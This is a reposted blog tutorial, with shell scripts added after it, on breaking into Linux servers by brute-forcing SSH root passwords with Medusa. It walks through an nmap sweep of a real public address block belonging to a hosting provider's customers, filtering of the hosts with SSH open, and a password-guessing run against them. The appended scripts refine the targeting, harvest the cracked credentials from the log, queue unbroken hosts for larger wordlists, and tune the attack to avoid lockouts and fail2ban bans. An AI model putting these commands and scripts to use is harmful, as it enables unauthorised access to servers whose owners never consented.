Hack linux ssh passwords with Medusa

Source: Internet
Author: User
Tags: imap, nntp, snmp, wrapper, pcanywhere

Reposted from ' blog (the original author's name did not survive translation)

Bored, so I'll write a bit. Medusa is still pretty fast at cracking; first let's look at the help output.

[email protected]:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) jomo-kun/foofus Networks <[email protected]>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
  -h [TEXT]   : Target hostname or IP address
  -H [FILE]   : File containing target hostnames or IP addresses
  -u [TEXT]   : Username to test
  -U [FILE]   : File containing usernames to test
  -p [TEXT]   : Password to test
  -P [FILE]   : File containing passwords to test
  -C [FILE]   : File containing combo entries. See README for more information.
  -O [FILE]   : File to append log information to
  -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
  -M [TEXT]   : Name of the module to execute (without the .mod extension)
  -m [TEXT]   : Parameter to pass to the module. This can be passed multiple times with a
                different parameter each time and they will all be sent to the module (i.e.
                -m Param1 -m Param2, etc.)
  -d          : Dump all known modules
  -n [NUM]    : Use for non-default TCP port number
  -s          : Enable SSL
  -g [NUM]    : Give up after trying to connect for NUM seconds (default 3)
  -r [NUM]    : Sleep NUM seconds between retry attempts (default 3)
  -R [NUM]    : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  -t [NUM]    : Total number of logins to be tested concurrently
  -T [NUM]    : Total number of hosts to be tested concurrently
  -L          : Parallelize logins using one username per thread. The default is to process
                the entire username before proceeding.
  -f          : Stop scanning host after first valid username/password found.
  -F          : Stop audit after first valid username/password found on any host.
  -b          : Suppress startup banner
  -q          : Display module's usage information
  -v [NUM]    : Verbose level [0 - 6 (more)]
  -w [NUM]    : Error debug level [0 - 10 (more)]
  -V          : Display version
  -Z [NUM]    : Resume scan from host #

Note the convention: the lowercase options -h, -u and -p take a single value, the uppercase -H, -U and -P take a file. OK, let's see what modules Medusa has, i.e. which services it can attack.

[email protected]:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) jomo-kun/foofus Networks <[email protected]>

  Available modules in ".":

  Available modules in "/usr/lib/medusa/modules":
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + ncp.mod : Brute force module for NCP sessions : version 1.0.0
    + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.2
    + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + svn.mod : Brute force module for Subversion sessions : version 1.0.0
    + telnet.mod : Brute force module for telnet sessions : version 1.2.2
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + web-form.mod : Brute force module for web forms : version 1.0.0
    + wrapper.mod : Generic Wrapper Module : version 1.0.1

Well, we're going to attack SSH, so we load the SSH module with the -M ssh parameter, without the .mod extension.

First we pick the targets: scan for machines with SSH open. This takes a while.

[email protected]:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

Then comes the long wait. The options above mean: scan the entire /24 for machines with port 22 open (-p22), fingerprint the service version (-sV), and write grepable output to the file ssh (-oG ssh).

Then we look at the scan results:

[email protected]:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue June 02:18:28 as: nmap -sV -p22 -oG ssh 69.163.190.0/24

Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com)  Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com)  Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com)  Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com)  Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.13 (alt-malware.com)  Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Like this. Now we have to tidy this up and keep only the IPs that have SSH open, which is where the grepable -oG format pays off.

[email protected]:/pentest# grep 22/open ssh | cut -d " " -f 2 >> ssh1.txt

This command uses cut; I won't go into its details here. Let's view the results.

[email protected]:/pentest# cat ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
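The scan and the grep | cut step above, as an added shell example that is not part of the original post. It parses nmap's grepable output the way the one-liner does, but matches port 22 as a whole field, so a host that only has 2222/open (or 122/open) is not swept into the target list by the substring match 22/open. The scan output embedded below is constructed for the example and uses documentation addresses (192.0.2.0/28); the real input is the file written by nmap -sV -p22 -oG ssh 69.163.190.0/24.

```shell
#!/bin/sh
# Added example (not from the original post): pull out the hosts with 22/tcp
# open from nmap -oG output. Each host line has the layout
#   Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ...

# Constructed sample of what "nmap -sV -p22 -oG ssh <range>" writes. Real nmap
# separates "Host:" and "Ports:" with a tab; the parser accepts tabs or spaces.
sample_scan() {
    cat <<'EOF'
# Nmap 5.00 scan initiated as: nmap -sV -p22 -oG ssh 192.0.2.0/28   (constructed sample)
Host: 192.0.2.1 (gw.example.net)   Ports: 22/closed/tcp//ssh///
Host: 192.0.2.4 (a.example.net)   Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 192.0.2.5 (b.example.net)   Ports: 22/filtered/tcp//ssh///
Host: 192.0.2.6 (c.example.net)   Ports: 2222/open/tcp//ssh//OpenSSH 5.1p1/, 22/closed/tcp//ssh///
Host: 192.0.2.7 (d.example.net)   Ports: 80/open/tcp//http//Apache httpd/, 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2/
# Nmap done -- 16 IP addresses (5 hosts up) scanned
EOF
}

# The post's one-liner. "22/open" is a substring match, so 2222/open and
# 122/open also qualify and the target list gains hosts that do not actually
# expose SSH on port 22. Reads the file(s) given, or stdin.
ssh_open_hosts_naive() {
    grep 22/open "$@" | cut -d " " -f 2
}

# Stricter version: split the line into port entries and require an entry
# that starts with exactly "22/open/tcp/". Reads the file(s) given, or stdin.
ssh_open_hosts() {
    awk '
        /^Host:/ {
            ip = $2
            n = split($0, entry, /[ \t,]+/)
            for (i = 1; i <= n; i++)
                if (entry[i] ~ /^22\/open\/tcp\//) { print ip; break }
        }' "$@"
}

echo "naive (grep 22/open):";  sample_scan | ssh_open_hosts_naive
echo "strict (port 22 only):"; sample_scan | ssh_open_hosts
```

On the constructed sample the naive filter lists 192.0.2.4, 192.0.2.6 and 192.0.2.7, while the strict one drops 192.0.2.6, whose only open SSH port is 2222. To build the target list from the real scan file, use `ssh_open_hosts ssh > ssh1.txt` in place of the grep | cut pipeline.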
Then we find a dictionary and start brute-forcing the SSH password. Here ssh1.txt is the target list from the previous step (-H), root is the single username tried (-u), p.txt is the password list (-P; seven entries, as the output below shows), and ssh selects the module (-M).

[email protected]:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) jomo-kun/foofus Networks <[email protected]>

ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: postgres (5 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: webmin (6 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: fuckyou (7 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
OK, now we wait. You can go do something else in the meantime; any successful login is printed automatically as an ACCOUNT FOUND line among the ACCOUNT CHECK lines.
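Medusa reports every successful login with an ACCOUNT FOUND line, and with -O (from the help above) it appends the same output to a log file, which is what you want when a run over a whole /24 takes hours. The following is an added shell example, not from the original post, that harvests the found credentials out of such a log and lists the hosts that were tried without a hit. The log lines it parses are constructed for the example (documentation addresses, made-up passwords) in the ACCOUNT CHECK / ACCOUNT FOUND line format Medusa prints; the command in the comment is the post's invocation with the -e, -f, -t and -O options from the help added.

```shell
#!/bin/sh
# Added example (not from the original post): harvest credentials from a
# Medusa log. A run like the post's, with a log file, the extra checks for an
# empty password and password == username (-e ns) and stop-on-first-hit per
# host (-f), looks like:
#   medusa -H ssh1.txt -u root -P p.txt -M ssh -e ns -f -t 4 -O medusa.log
# Keep -t low against sshd: MaxAuthTries and fail2ban-style blocking on the
# target will drop or ban a source that hammers a host with parallel logins.

# Constructed sample log in the format Medusa prints (one ACCOUNT CHECK line
# per attempt, ACCOUNT FOUND on success).
sample_medusa_log() {
    cat <<'EOF'
ACCOUNT CHECK: [ssh] Host: 192.0.2.4 (1 of 3, 0 complete) User: root (1 of 1, 0 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 192.0.2.4 (1 of 3, 0 complete) User: root (1 of 1, 0 complete) Password: admin (2 of 7 complete)
ACCOUNT FOUND: [ssh] Host: 192.0.2.4 User: root Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.0.2.5 (2 of 3, 1 complete) User: root (1 of 1, 0 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 192.0.2.5 (2 of 3, 1 complete) User: root (1 of 1, 0 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 192.0.2.7 (3 of 3, 2 complete) User: root (1 of 1, 0 complete) Password: pass word (1 of 7 complete)
ACCOUNT FOUND: [ssh] Host: 192.0.2.7 User: root Password: pass word [SUCCESS]
EOF
}

# Print "host<TAB>user<TAB>password" for every ACCOUNT FOUND line. The password
# is everything between "Password: " and the trailing " [SUCCESS]", so
# passwords containing spaces survive. Reads the file(s) given, or stdin.
found_accounts() {
    awk '
        /^ACCOUNT FOUND: / {
            line = $0
            sub(/^ACCOUNT FOUND: \[[^]]*\] Host: /, "", line)
            host = line; sub(/ User: .*/, "", host)
            sub(/^[^ ]* User: /, "", line)
            user = line; sub(/ Password: .*/, "", user)
            sub(/^[^ ]* Password: /, "", line)
            pass = line; sub(/ \[SUCCESS\]$/, "", pass)
            printf "%s\t%s\t%s\n", host, user, pass
        }' "$@"
}

# Hosts that were tried but never yielded a login, i.e. what is left for a
# bigger wordlist. $5 is the IP on both line types. Reads file(s) or stdin.
hosts_without_hit() {
    awk '
        /^ACCOUNT CHECK: / { seen[$5] = 1 }
        /^ACCOUNT FOUND: / { hit[$5] = 1 }
        END { for (h in seen) if (!(h in hit)) print h }' "$@" | sort
}

echo "credentials found:"; sample_medusa_log | found_accounts
echo "hosts with no hit:";  sample_medusa_log | hosts_without_hit
```

Against a real run, `found_accounts medusa.log` gives a tab-separated list you can feed straight into a follow-up loop, and `hosts_without_hit medusa.log` becomes the -H file for the next pass with a larger wordlist.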
